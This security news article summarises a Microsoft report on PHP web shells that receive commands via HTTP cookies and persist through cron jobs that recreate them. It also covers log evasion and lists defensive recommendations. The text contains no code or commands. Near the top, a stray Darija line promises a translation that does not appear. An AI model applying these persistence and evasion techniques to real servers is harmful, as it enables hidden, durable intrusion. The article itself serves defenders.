Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers
هادي هي الترجمة ديال المقال لـ "الدارجة" المغربية، مع الحفاظ على التنسيق (Markdown):
Stealthy Persistence: Microsoft Uncovers Cookie-Controlled PHP Web Shells on Linux
TL;DR
Threat actors are using HTTP cookies as a covert control channel for PHP-based web shells on Linux servers. By leveraging the $_COOKIE superglobal to pass commands and using cron jobs for "self-healing" persistence, attackers can maintain remote code execution (RCE) while staying dormant during normal traffic and evading traditional logging.
The Microsoft Defender Security Research Team has released a detailed report on a shifting trend in web-based attacks: the use of HTTP cookies as a primary control mechanism for PHP web shells. Unlike traditional web shells that often rely on visible URL parameters or request bodies, these modern variants hide in plain sight by using cookie values to gate execution and deliver malicious payloads.
The Shift to Cookie-Controlled Execution
By utilizing the $_COOKIE superglobal variable in PHP, threat actors can consume attacker-supplied inputs at runtime without the need for additional parsing. This method provides a significant advantage in stealth, as cookies are a standard part of web traffic and are less likely to trigger security alerts compared to suspicious POST requests or unusual URL strings.
Microsoft identified three primary implementations of this cookie-controlled model:
- Multi-layered Obfuscated Loaders: These use multiple layers of obfuscation and runtime checks to parse structured cookie input, eventually executing an encoded secondary payload.
- Segmented Data Reconstruction: Scripts that break down structured cookie data to reconstruct operational components—such as file handling or decoding functions—on the fly. These may conditionally write and execute a secondary payload to the disk.
- Marker-Based Triggers: Simple scripts that use a specific cookie value as a "marker." When this marker is detected, the script activates threat actor-controlled actions, including file uploads and command execution.
Achieving "Self-Healing" Persistence via Cron
The research highlights a sophisticated persistence strategy that combines web architecture with Linux system utilities. In observed attacks, threat actors gained initial access through valid credentials or by exploiting known vulnerabilities.
Once inside, they established a cron job to periodically invoke a shell routine. This routine executes an obfuscated PHP loader, creating a "self-healing" architecture. Even if a security administrator detects and removes the malicious PHP file during a cleanup, the scheduled cron task simply recreates the file, ensuring a reliable and persistent RCE channel.
Evading Detection and Logging
The dual-pronged approach of using cron for persistence and cookies for execution control allows the web shell to remain dormant during normal application runtime. It only "springs into action" when it receives a specific HTTP request containing the correct cookie values.
"By shifting execution control into cookies, the web shell can remain hidden in normal traffic, activating only during deliberate interactions," Microsoft noted. This strategy reduces operational noise and ensures that routine application logs contain few, if any, observable indicators of compromise.
Recommended Defensive Measures
Microsoft emphasizes that these threat actors are not necessarily relying on complex exploit chains. Instead, they are leveraging legitimate environment features—such as web server processes and cron infrastructure—to preserve their access.
To counter these persistent web shells, Microsoft recommends the following security practices:
- Enforce MFA: Implement multi-factor authentication for all hosting control panels, SSH access, and administrative interfaces.
- Audit Scheduled Tasks: Regularly audit cron jobs across all web servers to identify unauthorized routines.
- Monitor Logins: Keep a close watch for unusual login activity, particularly on administrative accounts.
- Restrict Shell Access: Limit the shell capabilities of hosting control panels and restrict the execution of shell interpreters where possible.
- File Integrity Monitoring: Check for suspicious file creations or modifications within web directories.
The consistent use of these techniques suggests a reuse of established web shell tradecraft, signaling a need for defenders to look beyond traditional inspection methods and monitor for anomalies within standard web headers.
